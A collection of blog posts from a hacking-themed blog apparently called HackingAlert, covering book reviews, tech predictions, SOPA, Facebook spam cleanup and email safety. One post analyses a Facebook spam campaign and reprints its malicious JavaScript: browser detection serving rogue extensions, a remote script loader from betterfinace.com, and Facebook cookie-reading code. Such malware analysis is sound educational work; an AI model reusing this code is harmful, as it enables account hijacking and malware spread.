Hacking Alert

Review of Hackbook - Beginner's guide to hacking

2013-10-24T19:39:00.000+05:30

Hello my dear readers. I recently bought this awesome eBook called "Hackbook". I was surprised to find that it was very informative and useful even for a person like me who has been into hacking for quite a while now. As the author of the eBook is quite reputed in the hacking world.I did not hesitate to write a review of it.

Non technical writing for easy understanding
Descriptive screenshots to explain better
Powerful Tools
50 Pages of "NO BULLSHIT" content
Each section is independent of the previous section (Around 3-4 pages of each section)

The above features is what is mentioned in their sample page. So I will address as to how far what they have stated there is true to the buyer.

First off, the writing. The writing isn't technical. COMPLETELY AGREED. But the usage of technical words is important later on in the eBook is something you will find. The upside is that, he explained EVERY single technical keyword at some point of time in the eBook.

Second, the tools.. I was quite surprised when I actually received Hacking Tools.I felt a bit dangerous for a second :P But the most important fact is that I didn't expect anyone to give off free hacking tools along with it. And along with the links that are available in the eBook, you can gather a Hell load of hacking arsenal and learn more than you can imagine.

Third, Coding, Though he doesn't teach you the whole of coding in the book (which is near impossible for any writer). He stressed well on the importance of learning coding to become a successful and professional Hacker.

There hell load of pictures. The moment you read one of his screenshots you get a very good picture as to how to go about with the tool. The screenshots and "In-Picture" explanation is definitely a boost to the reading.

And as far as NO BULLSHIT content is concerned. There is only an "Introduction" page which has according to be the only non- informational page on the eBook!

I say this is a MUST buy book for a newbie hacker!

Check out their Book: Hackbook - Learn How to Hack eBook

Metasploit penetration testing Cookbook released!

2012-08-23T21:37:00.000+05:30

Metasploit® software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments. Capabilities include smart exploitation, password auditing, web application scanning, and social engineering. Teams can collaborate in Metasploit and present their findings in consolidated reports. The goal of the software is to provide a clear understanding of the critical vulnerabilities in any environment and to manage those risks.

MetasploitPenetration Testing Cookbook, By Abhinav Singh, targets both professionals and beginners to the framework. The chapters of the book are logically arranged with an increasing level of complexity and cover Metasploit aspects ranging from pre-exploitation to the post-exploitation phase thoroughly. The recipe structure of the book provides a good mix of both theoretical understanding and practical implementation.

This book will help readers in thinking from a hacker’s perspective to dig out the flaws in target networks and also to leverage the powers of Metasploit to compromise them. It will take your penetration skills to the next level.

The book starts with the basics such as gathering information about your target and gradually covers advanced topics like building your own framework scripts and modules. The book goes deep into operating systems-based penetration testing techniques and moves ahead with client-based exploitation methodologies. In the post- exploitation phase, it covers meterpreter, antivirus bypass, ruby wonders, exploit building, porting exploits to framework, and third party tools like armitage, and SET.

What you will learn from this book

· Set up a complete penetration testing environment using metasploit and virtual machines
· Learn to penetration-test popular operating systems such as Windows7, Windows 2008 Server, Ubuntu etc.
· Get familiar with penetration testing based on client side exploitation techniques with detailed analysis of vulnerabilities and codes
· Avail of exclusive coverage of antivirus bypassing techniques using metasploit
· Master post-exploitation techniques such as exploring the target, keystrokes capturing, sniffing, pivoting, setting persistent connections etc.
· Build and analyze meterpreter scripts in Ruby
· Build and export exploits to framework
· Use extension tools like Armitage, SET etc.

Approach

This is a Cookbook which follows a practical task-based style. There are plenty of code and commands used for illustration which make your learning curve easy and quick.

Who this book is for

This book targets both professional penetration testers as well as new users of Metasploit who wish to gain expertise over the framework. The book requires basic knowledge of scanning, exploitation, and Ruby language.

Book Details

· Paperback: 268 pages

· Publisher: Packt Publishing (June 2012)

· Language: English

· ISBN-10: 1849517428

· ISBN-13: 978-1849517423

· URL: Metasploit Penetration Testing Cookbook(Free shipping in India)

From free blog hosting to International Author - A journey of 3 years

2012-01-24T01:23:00.000+05:30

Hello Friends and readers. Today HackingAlert completes its 3 years of operation. First of all I would like to apologize for the delay in posts these days as I got a bit busy with relocating to another city. I will be actively blogging again from next month.

Today is a day of celebration for HackingAlert. The blog has completed 3 years of tough yet successful operation. Over the coarse of time the blog grew slowly and slowly to make an impact in this huge world of web. Writing this post reminds me about the first blog post which was "what is hacking". I struggled alot while writing it. It was a small post, but while I was writing that post I had never imagined that one day this blog will do wonders for me. It not only helped me in enhancing my knowledge and sharing it, it also helped me to give back something to the community from where I have learnt so much. Over the time, the appreciation and critics made me stronger and forced me to take blogging more seriously. Today I can proudly say that HackingAlert has made a space in the world wide web. Let me take you through some of the stats:

In past 3 years HackingAlert has traveled all the way from alexa rank of around 30 million( 3 crore) to 1.3 lakh. Alone in India the blog has a traffic rank close to 15,000 and links in more than 120 different websites.

The blog traffic has grown by more than 200% in past one year and so far the blog has received a total of around 7 lakh hits. Soon it will hit one million. The above image shows the rapid growth in traffic for the year 2011. There were only few thousand hits in the early days, but today the blogs daily hit is double of the number of hits it got in year 2009. From past three months the blog has received more than 1 lakh hits per month which accounts to nearly 40% of total blog traffic.

In its 3 years of operation the blog has built up a community of more than 2500 followers and 1600 subscribers. Though the figure may seem small but the increase is two fold in the recent few months.
The blog contains more than 250 posts out of which around 50 posts appear on the top page of Google result. Visibility in search result plays a key factor in building a healthy traffic. The quality of post is always the dominant factor to result high in search queries.

HackingAlert now ranks amongst top 10 blogs on computers/technology/hacking in India(Indiblogger stats).

It also ranks second on Networkedblog(Biggest hub for blogs on Facebook) in the catagory of Hacking and network security.

HackingAlert has also featured in some of the top Information security magazines and portals like The Hacker News, Voice of Grey hat, HACKER5, Hack9 etc.
More than 15 different articles have been published so far.

The success of HackingAlert also brought me lots of appreciation. It gave me a platform to share my knowledge with others and inturn learn from others. The quest for taking blog to new heights always pushed me to keep looking for new things. This helped me to report several vulnerabilities in some of the top ranked websites. The appreciation of my readers helped me in publishing several papers and vulnerability submissions. Nothing best of me could have been possible without the comments and support that people showed.
The blog not only helped me in improving my knowledge but it also helped me in improving my writing skills. This attracted one of the prominent publication house of London, PACKT publishers. They publish books related to computer science and they offered me to write a book which will be a world wide release.
Never in my dreams had I thought that a free blog hosting will one day make me an international author.
Well the story didnt end there, the blog also attracted some of the industry people as well. It brought me some good job offers and consultancy work. I can proudly say that HackingAlert has played a big role in helping me find a job in Worlds Number 1 security company, Symantec.

It certainly sounds like a story, but its true, atleast for me. I did put in lot of effort behind my blog. At times I did feel like giving up, shutting down. But something inside me always pushed me to try harder.
I am really thankful to all my readers for reading my posts and commenting on it. It is the comments and appriciation that has kept me going for past 3 years and I have felt that my hard work has paid now.
Nothing best of this blog would have been possible without the support of you readers.

People generally dont take blogging seriously. But it teaches you the real ethics of internet. It teaches you a part of web technology, a part of social networking, a part of search engine optimization, a part of networking, a part of technology and everything you want to blog about. It does make you a complete geek and provides you a platform where you can share your ideas and knowledge. I find blogging far more interesting than wasting time on facebook or other social networks. I wrote this blog not to make a story about myself, but to inspire people, specially my readers. I dont say that I have done something too big, but atleast I can tell the importance that web and blogging can play in ones life and how we can use it to our benefits.

Google Crome's tagline says "The Web is what you make out of it". This line inspires me alot. It makes me feel that web is my own and I can use it the way I want. I chose to make my web as a blog, a place to communicate with like minded people. I want this to be the story of every individual who comes to my blog. Don't blog to just earn money out of advertisements. use it to share knowledge and you will surely get rewarded for it one day.

I end this post by thanking all my readers for their support. I wish HackingAlert keeps providing you relevant information for many more years to come.

-------------------- 3 years completed ------------LYNS---------------DARKLORD!!-----------------

Internet Observatory Setting New Heights with Real-Time IP Traffic Trends

2012-01-07T02:43:00.001+05:30

Hello Friends. Here is a guest post from Adriana Jones on a very interesting topic. Special thanks to Adriana from HackingAlert for sharing this article. You can find her bio at the end of the article.

It is like a watchful eye always hovering over the Internet. It is like someone keeping the Internet users on a leash. What is it actually? It is nothing but a service or a service offered by a website which has the task of monitoring global traffic 24 hours a day across various regions in the globe. It is better known as ‘Internet Observatory’ which is a venture of Ipoque, the well-known German traffic management company. The task of Internet Observatory is to offer insights into the real time IP traffic trends and bring forth the real numbers for bandwidth consumption by various applications.
All the tracking is impressive and internet providers are going to be helped out of it. Internet Observatory has been launched as a free service monitoring Internet traffic around the globe round the clock.
Prior to the launch of the Internet Observatory, Ipoque’s Internet Studies have been a continuous source of Internet traffic statistics since its inception back in the year 2006. Ipoque was in charge of generating yearly reports which showcased granular statistics of the Internet traffic covering eight regions of the world. Though the reports were detailed, it was found that the data were just snapshots of the Internet traffic patterns covering a certain period of time. Internet Observatory on the other hand generates real time IP traffic trends; that is live data, 24 hours a day and that too not just snapshots but real long term statistics.
Launched at the Broadband World Forum in Paris, the statistics generated by Internet Observatory gives a real insight into the amount of traffic caused by P2P, the competition between Skype traffic and SIP trafficas well as which Instant messaging client is enjoying a steady and increased flow of traffic. A close study of the statistics generated will reveal that P2P traffic in Europe claims a huge share which stands for nearly more than a quarter of all bandwidth along with 40% of the packets sent. It has been traced that nearly all of it comes from BitTorrent whose traffic exceeds 50% during night. Even with geographic limitations, Internet Observatory is successful in generating interesting IP traffic trends which are vital for internet providers around the world.
The Internet observatory is sort of a real entity in the world of Internet. According to Klaus Mochalski, the person behind this real time IP traffic trends monitoring project at Ipoque, Internet Observatory is set to become something which is coined as ‘Internet Seismograph’. In his words, Internet Observatory is going to be a kind of information service provider that will bring reliable data generated once per hour regarding how Internet users across the globe utilize the resources to all those who wants to know.
Though Internet Observatory is generating real time IP traffic trends in the Europe region only, Ipoque assures that it will soon cover other regions including America, Middle East, Africa, Asia and Australia. A follow up project of Ipoque after Internet Statistics, Internet Observatory gets all the support in data collection from Ipoque’s prestigious clients and partners.
For those who will benefit from the live IP traffic statistics including internet providers around the world, Internet Observatory is a store house of valuable information about Internet traffic. Equal interest and support from the Internet Community is also giving the project a boost. As an instance cited by those behind the project, data collected by the Internet Observatory is being contributed to an ICT statistics project which is sponsored by the European Commissions. Despite being a modular project, Internet Observatory is yet to evolve. The appreciation has given a new zeal to those behind the project to take it further and extend data coverage. All the real time IP traffic trends are being projected as line, pie or area charts taken over different time intervals.

About the Author: Adriana Jones is a Freelance and Staff writer who writes informative articles on internet providers in different areas. She is an expert on topics related to cables internet providers, broadband services, telecom etc.

Technologies that will heat up in 2012

2012-01-07T02:19:00.001+05:30

Hello Friends. Lets start the new year with the first post contributed by many readers. Its never easy to predict the flow of technology as it can be at times turbulent and at times mild. Still HackingAlert collected some advice from its readers. So here are a few technologies that can shine up in 2012.

Tablets

Undoubtedly tablets will outshine smart phones in 2012. With the dominance of ipad2 and samsung galaxy, the market will surely heat up with new players like HTC, Blackberry. In 2011 tablet sales contributed to 12% of PC market. More than 2% of internet population has shifted to tablets. These stats are sure to double this year in 2012. The year is certainly going to be a tablet boom with much awaited products lined up like ipad3, ice-cream sandwitch tablets etc. Alone in India, the launch of world's cheapest tablet Akash has recieved even more demand than ipad. So far 1.5 million Akash devices have been booked online.
Contributors for this technology:

Semantic Web

Semantic web means a web of data that allow machines to understand that meaning of data or information written over the World Wide Web. In the existing webs various tasks like searching for a book, downloading a movie, searching for the lowest available prices etc. are performed by human interventions because webs are designed to be read by human not by machines. But in semantic webs information can be interpreted by machines and such type of task can be accomplished without human interventions. If User want to search something over the internet, search engine will display all the content whether relevant or irrelevant for user. User have to find again relevant data whereas, in semantic technologies computer reads the word or phrase searched a user using search engine and produce the specific relevant result by the means of artificial intelligence techniques. In the web 3.0 there will be no need for you to be a programmer before editing the site,the user of the site will also be a modifier and editor.

Contributors For this technology

NFC & M-Commerce

Well The two technologies are different but they are almost inter-related.

Imagine tapping your phone to a receiver at a register, and instantly paying for an item without fumbling for your wallet. Or getting into a movie theater with a similar tap of your phone. Or being able to load your transit card onto your phone, using a simple tap to deduct money for every trip on the subway.
All of that is already possible with the help of near-field communication chips, which transfer small amounts of data through a short-range, low-friction connection.
Currently, you can buy the Google Nexus S phone, which carries an NFC chip and the Google Wallet companion app for syncing your credit cards to your phone and making mobile payments at participating vendors. Meanwhile, RIM is baking NFC chips into newer phones such as the BlackBerry 9900, and recently it introduced Tag, a RIM-specific feature that allows BlackBerry users to transfer contact information and documents. Growth in NFC enabled devices will surely bring a boom in M-Commerce.

Contributors for this technology

Human Sensing Commands

Well NO one reported about this technology but I believe that human sensing commands like Voice commands and touch commands will be the main focus in 2012. Lets talk a bit in detail. Siri has already shocked the world with its unique way of sensing human voices. Similarly Android is rolling out its face recognization phone unlock tecjnology in Android 4.0 enabled smart phones and tablets. But my pick of the year will be Windows 8. Obviously Microsoft is taking a very bold and ambitious move by single handedly tackling the PC market by launching a completely touch based operating system. Its tough to predict the success of Windows 8 but I certainly believe that microsoft will have a upper hand in it. The excellence of Windows will surely impress the users and force them to shift from mouse and keyboard to Touch screens.

On Demand TV content / Internet TV

Internet is everywhere now. We are connected and surrounded by it. TV is the next big platform where the world wide web is searching for possibilities and year 2012 is going to be cruicial for it. Though internet and on demand TV have been in market for quiet some time but they have not reached the masses. It is yet to catch attention. But what special will happen in 2012? Apple TV is the answer. Apple is the pioneer for several technologies and with the entry of Apple in this segment, you can surely bet your money on it. Players like Google, Logitech are already in market but the success rate is still slow. The shift of apps on TV will surely provide a new taste to tech savy people.

Contributors for this technology

Dual Core Mobile Processors

In 2011, the Motorola Atrix and the Droid Bionic were the first commercially popular smartphones to sport dual-core processors. In the fall, Apple’s iPhone 4S followed suit--and now it seems unlikely that any smartphones unveiled in 2012 will be competitive unless they can offer the same processing power that Apple’s phones do.
As a result, you should expect to see a surge in dual-core mobile devices. ARM executive James Bruce, whose company licenses the designs of chips that find their way into almost every mobile device in the world, said in a May interview that dual-core processors would be a huge part of making smartphones not just powerful but also battery-efficient.“If you look at handsets today, we’ve seen dual-core handsets reduce power consumption,” he says. For example, if you're sending a text message, dual-cores have the potential to effectively streamline the lower-power functions of the phone through one core, while reserving the other core for more power-intensive functions, like gaming or navigation.

Contributors of this technology

Hyper Hybrid Cloud

This technology is currently the new taste of startups. We have seen a tremendous growth in cloud technology in past 3 years. This year can be somthing new. There are lots of big cloud players available on the internet. The problem arises when the data from one cloud storage(eg. google) has to be transferred to another cloud storage(eg amazon). This is really a major issue these days and companies are battling over it. Probably a hbrid cloud can be a solution o this problem which can allow a seemless data transfer from one cloud to another. It can be seen like a new internet within the internet.

IT Security

It was surprising for me to see that no one talked about IT security when I asked for an article on technologies of 2012. Obviously security is nothing new. But I personally believe that IT security is going to re-born in 2012. The reason is quiet evident in 2011. The year 2011 has been the "Year Of Hacks" where almost every major online company was made a victim in some form or the other. CEO's will surely spend some serious money for IT security this year so we may see some big changes in this sector. Use of better authentication features, protocol updates, cloud security, on-demand security can be some of the rising sectors. I am really looking forward to see how the industry responds back to security in 2011 as you all know what disasters have happened in 2011. Lets see weather we have learnt some lessons or not.

These are a few technologies to eye on for this year. We have an entire year ahead in-front of us and will surely bring lots of surprises. This sector changes almost every day. Nothing can really be predicted about success or failure. Lets see how this year shapes up in terms of technology growth. Share your suggestions and comments.

DARKLORD!!

Contribute to HackingAlert : Submit An Article on Technologies that will heatup in 2012

2011-12-30T16:02:00.000+05:30

Hello friends. HackingAlert had a glorious 2011 and its full credit goes to you readers. Its your support and suggestions which has kept me going. Even with scarcity of time, I still had to push myself to write on the blog and I was able to make that extra push just because of the encouragement I got from you all.

I am thankful to all of you. So I have decided to post the first article of 2012 which is contributed by my readers.

Topic : Technologies that will heat up in 2012

I have picked up a simple and less technical article so that maximum people can contribute. You have to write an article on those technologies which you think can be "THE TECH-NEX" for 2012. You can search on the internet and do your own mini research to figure out what can be the best technologies for 2012.

Here are a few guidelines:

You dont have to give a complete technical description of the technology. Just describe the technology and the reason why it will grow strongly in 2012 (around 150 words per technology). Make sure you use your own words to describe the technology.

You can submit maximum 5 technologies. Not more than that.

Dont be gadget specific. Like "iphone 5". What I mean is that iphone is a gadget, not a technology. Infact there is a new processor that will be implemented in iphone that can be a revolution in 2012( guess!!). So focus on the technology that any revolutionary gadget implements.

Make sure you choose those technologies which are relevant in the field of Computers and internet. ( dont choose a micro-biological tech ;-) )

Here is a sample article for you which I wrote last year - Technologies that will heat up in 2011

Submit your entries before 2 January 2012. The article will be published on 4 Jan 2012.

You can create a word document and submit your article at abhinavbom@gmail.com.
At the end of the article mention your Name, Email address, URL(optional) and your photograph(optional). In case your technology is selected for the article then we will publish it along with your photograph.

Something for everyone:

All my readers are equally important for me. So this is not a competition. There can be chances that the same technology is submitted by many contributors.
So I will publish the name and photograph(in case you have submitted photograph) of all those who have submitted that technology.

In the final article I will choose around 7-8 technologies so you have all chances to star on HackingAlert :) .

I will encourage all of you to make maximum participation in this small event and make it the successful start for the year 2012.
No one's entries will be neglected. Anyone who contributes an article will be featured on the blog. So I want maximum people to participate.

Wish you all HAPPY NEW YEAR......Good luck for the article.

DARKLORD!!

A simple HTML tag to crash 64-bit Windows 7

2011-12-25T15:23:00.001+05:30

SOPA - the end of internet as we know it!!

2011-12-24T01:36:00.001+05:30

Imagine an internet where you dont have video uploading websites youtube or vomio. Imagine an internet where you dont have photo uploading sites like flickr and photobucket. Imagine an internet where you can blog not by your choice, but by that or others. At the worse imagine an internet where a Google search for "download Firefox" will return no results.

An internet of this kind will not be far away if SOPA becomes a law. Let me start with the beginning. What exactly is SOPA. What restrictions it will impose and what pos and cons will it have on the present internet scenario.

The Stop Online Piracy Act (SOPA), also known as H.R. 3261, is a bill that was introduced in the United States House of Representatives on October 26, 2011, by Representative Lamar Smith. The bill expands the ability of U.S. law enforcement and copyright holders to fight online trafficking in copyrighted intellectual property and counterfeit goods.
Lets make it simple and Indian. If you post anything on your blog that is a copyright material then you can face trial if the copyright owner complaints about it. In the simplest of cases you will have to remove your website/blog, and in worse situations you can face trial as well. The bill would allow the U.S. Department of Justice, as well as copyright holders, to seek court orders against websites accused of enabling or facilitating copyright infringement. Depending on who requests the court orders, the actions could include barring online advertising networks and payment facilitators such as PayPal from doing business with the allegedly infringing website, barring search engines from linking to such sites, and requiring Internet service providers to block access to such sites. The bill would make unauthorized streaming of copyrighted content a felony. The bill also gives immunity to Internet services that voluntarily take action against websites dedicated to infringement, while making liable for damages any copyright holder who knowingly misrepresents that a website is dedicated to infringement. This bill will give full internet censorship to USA. This bill clearly protects the rights of US intellectual property holders around the globe. A copyright owner of USA can sue a person in India through this bill. I would say this is America's own version of "The great Firewall of China".

The bill has met with lots of protest, especially online. In one of the most popular cases, Godaddy, a famous domain service provider who supported this bill is now facing a mass boycott. People are shifting their domains from Godaddy to other service providers. The big shocker came when companies like Microsoft, Apple, Adobe and other 26 giants silently supported the bill. I will explain you why they are in support. The opposing companies published a complete add in the New York Times (nice to see Facebook and Google standing together):

Why SOPA can be a danger to internet?

Let's look at the following points to understand how this bill can be a danger to the present internet.

Bill targets more than infringing website

A Center for Democracy and Technology paper says that the bill "targets an entire website even if only a small portion hosts or links to some infringing content." What does this means? If someone posts a video on youtube that infringes copyright then the entire youtube can be brought down under this act ( nop I am in no mood for kidding !!). Well this is crazy. I think now you might have understood why Microsoft is supporting the bill. Even though a recent amendment says that the bill will not affect websites which publishes user content. So this can protect youtube,facebook etc but the bill still lays concerns about how these websites should deal with infringing content. In an excellent post, EFF has clearly mentioned how websites like vimeo, flickr and Etsy can face troubles. Read the article here.

DNS filtering

The bill says that DNS servers should filter any request from users that directs to websites which break copyrights. This means that USA can alone control the web traffic of the world to any domain or subdomain (seriously I am not kidding!!). This is clearly the biggest reason why this bill is facing a mass opposition from countries like Japan, Russia etc.

Threat to E-commerce

Sites like Ebay and amazon sell millions of products online. They contain all types of items that you can think of. Filtering contents based on copyright will be a nightmare for such companies. It will kill lot or company resource and money. Mid-size and smaller E-commerce websites will have no choice other than selling only branded products or shut down their business. (no point of kidding!!)

Threat to Online Gaming, Cloud computing and free web hosting

People have talked less about this on the internet but I want to shed some light on this issue as well. Cloud technology is greatly facilitating small and mid scale companies to run their business without worrying about resource problems. But SOPA can greatly affect the cloud market drastically. All the major cloud players are based in USA and if this act becomes a law then these companies will have to filter any content on the cloud that can infringe copyright. Now the question arises, how can these cloud service providing companies access the data of their customers? Will it not kill the very meaning of cloud? Why will I host my business data on a USA based cloud computing company then? (tough to say that I am not kidding!!)

Threat to information

Last but not the least. As I said earlier that this bill will create America's version of "The Great Firewall of China" as it will force the DNS servers to filter out any copyright infringing website/blog from its users. Search engines like Google and Yahoo! will have to start filtering for search contents. Well the question again comes. Can you imagine how much resource will be needed to filter out 32 million US requests every minute for Google.

SOPA has really created a dirty scene on the internet. Looking at the mass protest against this bill, Microsoft and Apple have finally showed some support for the bill by saying that "It needs to be worked on". But this is not enough. Maybe its the time when all the internet companies should stand up together and forget their rivalry and greed for some time because if this Act becomes a Law then Only God Can Save The INTERNET.
You can read the complete SOPA Act here. Download.

DARKLORD!!

Downloading torrent files through IDM

2011-12-19T12:04:00.000+05:30

I know, I know, I know that this is an old trick but I really had nothing new to post. I have been busy with my book so its getting tough to find out time for something new. But I will keep you posted with some new posts soon. Lets come back to today's post. Special thanks to - Hackdigital.

1. First of all , you have to download the torrent file(.torrent) which you want to download.

2. Then just go to the website www.torcache.net and upload the torrent file that you have just downloaded and click on the cache! button

3. This will give you a new torrent file . You just have to copy the link of the new torrent file from the opened window.

4. Then go to the website www.torrific.com and create an account there(in case you don’t have) and login to your account. Then paste the address of the new torrent obtained in step 3 and click on Get button.

5. Now you will get the list of available files present in that torrent file. Then click on the initiate bittorrent transmission button. This will give the full option to download the file. Just click on any link and you can see the download manager-IDM popping out for downloading the file.

Now enjoy the ultimate Speed of IDM for downloading torrents too.

DARKLORD!!

5 Things to do when you are hit by a Facebook spam

2011-12-16T15:17:00.000+05:30

These days there are two things that are spreading fast on facebook:
First is the spam containing inappropriate content.
Second is the photo people are sharing after they are hit by the spam( and putting all blame on hackers).

Recently one of my friends pointed out a strange thing happening with his account. He tried to delete the spam but in turn it started spreading through his profile even though he didn't click the spam link. Well its tough to tell why this is happening but his problem shifted my attention back to the spam codes where found a buried script which was doing quiet a fun with the cookies. I didn't notice that script while I posted about the "This happens on live television spam". Later today my friends problem brought my attention to that script. Anyways I dont want this tutorial to turn too geeky so I will speak simple language.
Lets talk about 5 things that you can do to completely get rid of the spam in case you accidently( or knowingly) clicked it. The steps mentioned here are in order. So if you are a victim then follow all the five steps starting from step 1.

1. Report as spam
(special thanks-sami ullah)

This is the first precautionary step. Immideatley report the spam to facebook( dont click on delete). Reporting as spam automatically hides the link from your feed so dont take the risk of deleting it.

2. Disable the installed plugin

The recent spam asks you to install a missing plugin. So in case you have installed it, act fast to remove it. If you are using firefox then go to Firefox > Add-ons > Extensions . Here you will find the malicious plugin. Click on Remove to get rid of it.
For Crome users, click on the small Wrench(Rinch) icon at the right corner of the browser, then click on options and move to Extensions. Disable and remove the plugin from there.

3. Switch to Https

Immideately switch to https version of facebook if you still haven't. This will prevent any kind of session hijacking and will prevent the http cookies created by the spam in your system to re-post the link on the profile.

4. Clear Cookies, Browsing history and Browser cache
(special Thanks - Aquib Ahmed)

The spam creates lots of fake facebook http cookies on your system which can re-post the spam links on your profile and can redirect you to other links as well. So it is highly recommended that you delete all the browser cookies. Clearing history can also help in cases where you may again accidently click the link.
You can go to Browser options to clear the cookies, history etc.

5. Change the password

Last but not the least. Change the facebook password. Your facebook account is precious to you so why to take the risk.

These are a few steps you can follow to protect your account from spams. In case you have any other problem related to spam on your profile then add your comment here.

DARKLORD!!

Update : Thanks to Anna.L.Walls

"It Happens on Live television" Facebook spam demystified - A completely new form of Spam

2011-12-13T03:25:00.000+05:30

Hello friends. I love facebook spams. The reason is that you will find the best use of javascript, flash, facebook plugins and of coarse social engineering. There is always so much to learn. The last faebook spam which we looked at here in HackingAlert was the "How can Rehanna Do this" Facebook spam.

It was a browser vulnerability which was floating around for some days. Fortunately only Crome and safari were affected by that attack and it has been fixed now. Companies try real hard to fix all holes. But ultimately the security lies in you.

The recent spam is clearly the best spam ever flooded the social platform. It has been crafted very nicely and trickly. Lets demystify the spam and dig deeper into how the creators built this yet another headache for facebook. This time the target have been Firefox and Crome users.

As usual once you click on the malicious link, you will be asked to share it with your friends before you can watch. Here lies the first trap. Once you share it, you are pushed out of the platform to a blogspot link where you will be asked to download a plugin before you can watch the video. Even the plugin has been named as "youtube premium plugin"(Hats of to the thinker of this name :-) ). Look at the picture below. There are 3 things to notice in this.

Once you share this link on your profile, you will be redirected to a link outside the platform. Once the spammer or hacker succeeds you in dragging out of the platform, the real fun begins for him.
So the first thing to notice is the blogspot link which surely does not belong to facebook. The next thing to notice is the error message. This error message is a fake one. Infact the entire flash error generated looks like a error but it is only the use of image and text. The black background that you see is a simple html canvas. The red smily face that you see is an image and the link "install plugin" is a simple hyperlink created with html. Look at the neatness with which spammer has used simple html to look like a missing pluging error.
Now coming to the 3rd thing. Look at the image in the third part and notice the text written on its right hand side. Do you see any relation? A Girl showing somthing(which you might be dieing to see) and the text says "Premium property-B'lore. Obviously the property is premium in the image as well.
Actually the image has got nothing to do with the text. The text is a simple advertisement and the spammer has neatly added a video thumbnail so as to make it appear as the link to this video. Once you click that link, obviously you will not see that premium property which you wanted to and inturn the spammer will make pocket money through add clicks.
There is one more thing to look at. (this one is real fun!). Look at the image.

Just below the addvertisement, you will find the facebook social plugin for adding comments. Well its a fake plugin simply designed by HTML. Even the comments gives you message that in order to view this video you will have to share it first. This is Social Engineering at its best.

Now moving ahead with the spam. What happens when you click the link " install plugin" ?

The first thing that happens is a hidden javascript executes and it verifies your browser type. It checks weather you are using Crome or Firefox so that it can redirect you to respective links to download extensions.
If you are using Crome then you will be redirected to http://betterfinace.com/youtube.crx and if you are using firefox then you will be redirected to http://betterfinace.com/youtube.xpi . crx is the default extension for crome plugins and xpi for firefox.
Here is the javascript which performs this task:

var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;
function instalar(){
if (is_chrome){
window.open("http://betterfinace.com/youtube.crx");
}
else if(is_firefox){
var params = {
"Youtube Extension": {
URL: "http://betterfinace.com/youtube.xpi",
toString: function () { return this.URL; }
}
};

the download for the plugin will start after finding your browser type. here I am using firefox as an example.
Firefox will prompt you for download along with a warning that it is an untrusted plugin.

But how can we let go premium youtube plugin. So we will install it. Now in order to check what this plugin is actually ment for, we will have to decode the .xpi extension. If you open the .xpi extension then you will find lots of PK and JSPK texts which means that it is simply a compressed file. So rename it to .zip or .rar and then decompress it to view the content of the file.
I found the follwing javascripts in the file.

Presence of so many javascripts is enough to identify what this plugin is all about. Basically thsese scripts contain a lot of things. This spam has been designed to attack the user in every possible way. It adds malware, steals cookies of facebook from the victim system, adds a JS trojan and what not. let us dig out each of them.
prefman.js and script-compiler.js are required scripts for building firefox plugins. the only script to look for is youtube.js. It contains the hidden secret of this plugin. Give a look at the code:

loadScript_you();
function loadScript_you() {
if ('https:' == document.location.protocol) return false;
var s = document.createElement('script');
s.setAttribute("type","text/javascript");
s.setAttribute("src", "http://betterfinace.com/script.js");
var head=document.getElementsByTagName("head")[0];
if( head==null) return false;
head.appendChild(s);
return true;
}

The first thing. If you are browing https protocol then you are safe. It wont allow the creation of the script object to copy the location. On parsing this script, the browser will look for attributes in http;//betterfinance.com/script.js. Now the question is what dows this external script do?
Lets visit the link to analyse the script deeply.

function addScript() {
 var s = document.createElement('script');
 s.setAttribute("type", "text/javascript");
 s.setAttribute("src", "http://betterfinace.com/extra.js");
 var a = document.getElementsByTagName('script')[0];
 if (a == null) return false;
 a.appendChild(s);
 return true
}
addScript();

You will notice a similar script again. Well the reason for building such links is not clear to me. Maybe there is something I am missing. So this script also contains a link to another external javascript which will be appended in the plugin when browser parses it. Let us see what is hidden in this link.
Well this is the script which holds all the secret. I am still looking at this script deeply. Some of the functions which were easy to catch were ;

function fb_comparte() : this function is responsible for generating the random fake plugin comments which we saw above.

function readCookie(a) : got damn! cookie stealer for any link you visit.

function setCookie(nombre, valor, caducidad) : randomly adds cookies to track your internet activities.

function FBFBFB321() : Facebook cookie stealer ( not again). Here is the snippet.

function FBFBFB321() {
if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {
var cook = readCookie("fb_videoazs");
if (cook == "activo") {
return false;
}
var user_id = readCookie('c_user');
if (user_id == null) return false;
cook = readCookie("fb_videobzs_" + user_id);
if (cook == "activo") {
return false;
}
setTimeout(function () {
fb_comparte();
}, 2000);
return true;
}
return false;
}

There are some other scripts too but I am too tired now so want to end this post.
Time and again facebook has been hit by such spams. We need to aware of what we do on facebook. Think before you click, before you share.
The spam is still active on the internet so you can go ahead and try out your own research. Facebook spams are a great tool to learn. You really get to know the tricks used by hackers and spammers to make you their pray. Hope you enjoyed my efforts. Time to watch out some premium property ;-) .
Do add your comments and suggestions.

DARKLORD!!

Why Email attachments can be dangerous?

2011-12-12T23:21:00.000+05:30

Festive season is on. Online e-commerce sites are busy attracting users. Similarly Spammers are also prepared to utilize the season for spreading spam and malwares. Recently I got a mail from Coca Cola(spam ofcorse) which said that I won lots of dollars( it ws so much that I dont remember the exact amount). It had a malicious pdf attachment. Hiding malicious codes inside pdf has become a prime target to bypass email filters. So I thought of writing an article on malicious email attachments.

Why can email attachments be dangerous?

Some of the characteristics that make email attachments convenient and popular are also the ones that make them a common tool for attackers:

Email is easily circulated - Forwarding email is so simple that viruses can quickly infect many machines. Most viruses don't even require users to forward the email—they scan a users' computer for email addresses and automatically send the infected message to all of the addresses they find. Attackers take advantage of the reality that most users will automatically trust and open any message that comes from someone they know.

Email programs try to address all users' needs - Almost any type of file can be attached to an email message, so attackers have more freedom with the types of viruses they can send.

Email programs offer many "user-friendly" features - Some email programs have the option to automatically download email attachments, which immediately exposes your computer to any viruses within the attachments.

What steps can you take to protect yourself and others in your address book?

Be wary of unsolicited attachments, even from people you know - Just because an email message looks like it came from your mom, grandma, or boss doesn't mean that it did. Many viruses can "spoof" the return address, making it look like the message came from someone else. If you can, check with the person who supposedly sent the message to make sure it's legitimate before opening any attachments. This includes email messages that appear to be from your ISP or software vendor and claim to include patches or anti-virus software. ISPs and software vendors do not send patches or software in email.

Keep software up to date - Install software patches so that attackers can't take advantage of known problems or vulnerabilities. Many operating systems offer automatic updates. If this option is available, you should enable it.

